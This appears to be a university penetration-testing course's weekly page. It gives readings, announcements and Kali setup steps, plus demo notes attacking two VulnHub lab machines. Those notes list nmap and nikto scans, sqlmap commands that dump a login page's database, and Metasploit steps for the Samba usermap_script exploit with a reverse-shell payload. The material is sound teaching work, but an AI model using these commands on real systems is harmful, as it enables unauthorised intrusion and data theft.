##Participation task:

Create a bitbucket repository, add a wiki, and share it with me (sutantyo) (1%)

##Readings:

• PT Chapter 4 for metasploit, but see the Offensive Security course below
• PT Chapter 5 on Port Scanning with nmap, but see the nmap guide in the list below
• You can also get started on PT Chapter 6-7 for more background reading

Note that you do not need to read EVERYTHING by this week. We are going to talk about these four tools and you are going to learn them bit by bit over the next 2-3 weeks (and even by then, I do not expect you to be experts). I do however expect that you make notes of the important things:

• if you are completely new to networking, it might be useful to read something very simple to get you up to speed, e.g. https://www.ipprimer.com/#/overview (let me know if you know a better resource)
• Offensive Security provides a free course on Metasploit: https://www.offensive-security.com/metasploit-unleashed/. You should read the chapters on Introduction, Metasploit Fundamentals, and then use the rest as a reference.
• nmap website: https://nmap.org/book/man.html (the book is mostly free). Read up to OS discovery to get you started
• sqlmap wiki: https://github.com/sqlmapproject/sqlmap/wiki. It even starts off with explaining what an SQL injection is
• OWASP ZAP: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

##Announcements:

###1. iLearn

Everyone enrolled should now have access to the forum.

###2. SecTalks

SecTalks is a monthly meetup focusing on IT security. The Sydney chapter holds the meeting every 2nd Tuesday at PWC offices in Barangaroo. I believe the plan is to finish the class at 5pm, and then whoever is interested can come along.

It is a good opportunity to see people who work in the security industry, but there are also many novices and students. Every meetup is usually followed by a CTF and then drinks at the local bar.

To sign up, you need to make an account with meetup.com and join: https://www.meetup.com/SecTalks/events/248276504/

I have a +3 on my sign-up, so if you're not sure about coming, you can decide later. However, if you are interested in coming, I would suggest that you sign up.

Topic of next week's SecTalks:

Reverse engineering and analysing the Microsoft Word vulnerability CVE-2017-11826 by demonstrating in-depth analysis and explaining about how the Exploit by-pass Microsoft mitigation techniques like ASLR, DEP; also as on add-on will cover the Shell code analysis. The exploit and vulnerability analysis will be performed using WinDbg, IDA Pro and other malware analysis tools. The attendees can walk away with basic idea on how > to approach Microsoft Word vulnerability analysis.

###3. Week 3 CTF

The first CTF is going to be group based and I will try to allocate the groups as fairly as I can. Please let me know by email if you have a preference on who to group with by this Friday. The students who participated in CYSCA last year will be distributed among the groups (we should have 6 groups at most).

###4. Textbooks

I will update the Resources page as we go, but in case you missed it, the last update was for a free Kali Linux book. It may help you get around in Kali Linux.

##Activities:

###1. OverTheWire Bandit Machine and Linux

We threw you in the deep end last week, but I hope you enjoyed the experience because I personally think the wargames are quite fun. By now, you would have had several hours worth of linux experience (or I hope anyway), so let us recap the more useful skills that you have acquired by now.

One of the most essential concept for you to know is that, every command you type is an executable that resides somewhere in the system. You can find out the location of this executable using the which command, e.g.

> which ls
/bin/ls

> ls -a -l
  OR 
> ls -al

However, it can be faster to use the --help option to get a summary of the options available for a program

> ls --help

You can read about it here: http://www.learnlinux.org.za/courses/build/shell-scripting/ch01s04.html for more information.

You also know a bit more about directory structure and moving around, i.e. cd

pwd   : print working directory, i.e. current directory
cd ~  : goes to home directory
cd /  : goes to root directory (i.e. the top level directory)
cd .. : goes to parent directory
cd -  : go to your previous working directory 

> find . -name hello

> find / -name hello 2>/dev/null

Finally, why do you have permission issues? Because every linux file has set permission on who can read, write, and execute. You can read more about it here: https://en.wikipedia.org/wiki/Chmod

2. Kali linux quality of life enhancements:

In last week's instructions on Kali installation, I added:

sudo apt-get install -y virtualbox-guest-x11

You need to enable some of these from virtualbox settings (General -> Advanced, Shared Folders).

Note that on Kali terminal window, ctrl+c is cancel. If you want to copy and paste from the terminal, use ctrl+shift+c and ctrl+shift+v.

If things don't work:

You may have installed virtualbox-guest before you did a dist-upgrade, so to fix this you need to uninstall virtualbox-guest. Do a dist-upgrade and then reboot.

sudo apt-get dist-upgrade
sudo reboot

apt-get purge virtualbox-guest-x11
apt-get autoremove --purge
reboot
apt-get update
apt-get dist-upgrade
reboot
apt-get update
apt-get install -y virtualbox-guest-x11
reboot

3. OWASP ZAP and Metasploit

Jeremy is going to give a demo of the above two tools. I will add supplementary notes later here. I hope has time for nmap as well.

Notes: if you want to set up the hosts, you need to modify the file /etc/hosts and add:

10.81.238.245   ms1
10.81.235.187   btr1

The machines are:

• btr1 https://www.vulnhub.com/entry/btrsys-v1,195/
• metasploitable1 https://www.vulnhub.com/entry/metasploitable-1,28/

Tools used for btr1:

1. nmap:
   • ping btr1
   • nmap btr1 -P0 -F
   • nmap -sV -O btr1
   • nmap -A btr1
2. nikto:
   • nikto -h btr1
3. dirb:
   • dirb http://btr1
4. browser:
   • go to Login.php
   • go to Find personnel.php
   • decipher javascript
5. OWASP ZAP:
   • set up proxy (and set Firefox to use this proxy)
   • spidering
   • active scan on personnel
   • request interception
6. sqlmap:
   • sqlmap -u 'http://10.81.235.187:80/personel.php' --data='kullanici_adi=btrisk&parola=tester' --flush  * sqlmap -u 'http://10.81.235.187:80/personel.php' --data='kullanici_adi=btrisk&parola=tester' --tables --dbs --columns --dump

Tools used for metasploitable1:

1. nmap (to find open samba port):
   • nmap ms1 -P0 -sV -F
2. enum4linux
3. metasploitable framework:
   • use module: use auxiliary/scanner/smb/smb_version
   • searchsploit samba 3.0.20
   • search usermap
   • set payload tt
   • search samba for usermap_script, use exploit/multi/samba/usermap_script
   • show options
   • set rhost <ip address>
   • set payload cmd/unix/reverse
   • set lhost
   • run

4. Time permitting

Download and install a machine from vulnhub. We are going to use the necromancer machine from vulnhub: https://www.vulnhub.com/entry/the-necromancer-1,154/. I have the image on USB in case internet is flakey again like last week.

You can import the machine image directly into virtualbox, but you need to set up host networking for it to work properly. Go to File -> Host Network Manager, and create one. Now on your Kali linux machine setting, go to settings -> Network, click on Adapter 2 and add a Host-only adapter. Add the same to your necromancer machine.

Start up the necromancer machine, and notice its IP address. For your Kali linux, change the connection to eth1 (I guess?) and see if you can nmap it.

Extras

VPN Access

I am not sure if this is required yet, but everyone should now have VPN access using your MQ id.

https://wiki.mq.edu.au/display/onenet/OneNet+Anywhere

apt-get install network-manager-openvpn-gnome network-manager-pptp network-manager-pptp-gnome network-manager-strongswan network-manager-vpnc network-manager-vpnc-gnome